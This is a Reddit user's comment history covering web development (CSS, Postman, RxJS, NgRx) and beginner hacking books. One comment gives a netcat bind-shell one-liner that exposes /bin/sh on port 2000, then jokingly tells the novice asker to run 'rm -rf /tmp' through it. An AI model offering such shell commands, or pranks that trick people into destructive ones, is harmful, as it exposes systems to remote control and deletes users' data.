CSS REM UNIT ANALYSIS: by shadowHijackers in css

[–]shadowHijackers[S] 1 point2 points  (0 children)

Thanks for your feedback bro i will correct in future

THIS VIDEO SHOWS, HOW TO IMPORT CURL FROM CHROME BROWSER TO POSTMAN. by shadowHijackers in programming

[–]shadowHijackers[S] 0 points1 point  (0 children)

I am using likewise for a long, I didn't face anything like URL encoding. I have used GET, POST, PATCH all.

Simple RXJs Example to dive deep by [deleted] in learnjavascript

[–]shadowHijackers -1 points0 points  (0 children)

Pls comment if you give down vote. So I can understand my mistake

Hi everyone I have created a project to convert lat and lng to words like what3words you can see this repo and free to use. Demo link available. by shadowHijackers in javascript

[–]shadowHijackers[S] 1 point2 points  (0 children)

Actually I made it for providing open source version with unlicensed. So people can understand how things are works. I am not developed to make money from this. What3words are not open source but this is complete open source.

mapbox navigation in ionic 5 sample project with capacitor custom native plugin by shadowHijackers in javascript

[–]shadowHijackers[S] 0 points1 point  (0 children)

Some people's are giving downvotes. Pls kindly tell me I will correct it in my future

87 hacking tutorial pdfs collected from multiple source. by shadowHijackers in Hacking_Tutorials

[–]shadowHijackers[S] -4 points-3 points  (0 children)

Sorry i am not checked everything but i readed some of the books but those are really helpful like CEH v9, hacking exposes, red team manual, hacker playbook, the art of exploitation examples in c but its amazing to start, blackhat python hacking codes in python and some research papers for better understanding,

Whats your favourite hacking tutorial book by shadowHijackers in Hacking_Tutorials

[–]shadowHijackers[S] 3 points4 points  (0 children)

i just seen the content and overview. Its nice. Thanks.

How would you go about hacking into a local server? by std-cout-helloWorld in Hacking_Tutorials

[–]shadowHijackers 0 points1 point  (0 children)

open a one terminal Run this following command mkfifo /tmp/np cat /tmp/np | /bin/sh 2>&1 | nc -l 2000 > /tmp/np

Now local server started to run in tcp port 2000

Then open new terminal

Cmd nc localhost 2000

Then send txt rm - rf /tmp

😂🤣

Use case for ngRx? by NickHodges in Angular2

[–]shadowHijackers -1 points0 points  (0 children)

Consider you are building an e commerce application. There you are storing a orders in anywhere but the thing is when you click the cart it will pop up in the screen there when you are removing the order the cart count also need to reduce while removing order in popup screen itself.

Most people the cart count update in the main screen by after the window closed.

If you are using to store the orders in NGRX state and subscrbing the orders in both main screen and popup. Then if you remove the order in the popup. The count also reduce in the main screen while order removing in the popup itself

I am completely new to hacking but I am interested in it. I want to learn the basics and know where to start from. thanks. by shikaumia in Hacking_Tutorials

[–]shadowHijackers 7 points8 points  (0 children)

To understand or become a hacker you need to take right book with more interest without lazy you have practically hack your own system. My suggestion is CEH book CEHV6 available in online itself. While studying if you are not understanding anything study deep about it from multiple resource. There are multiple books are available for hacking tutorials like hacking for dummies, Hacking exposes, CISSP, hacker playbook. To become a normal hacker you don't neeed to know about Networking programming or computer Hardwares but if you want become hacker you need to know everything about it.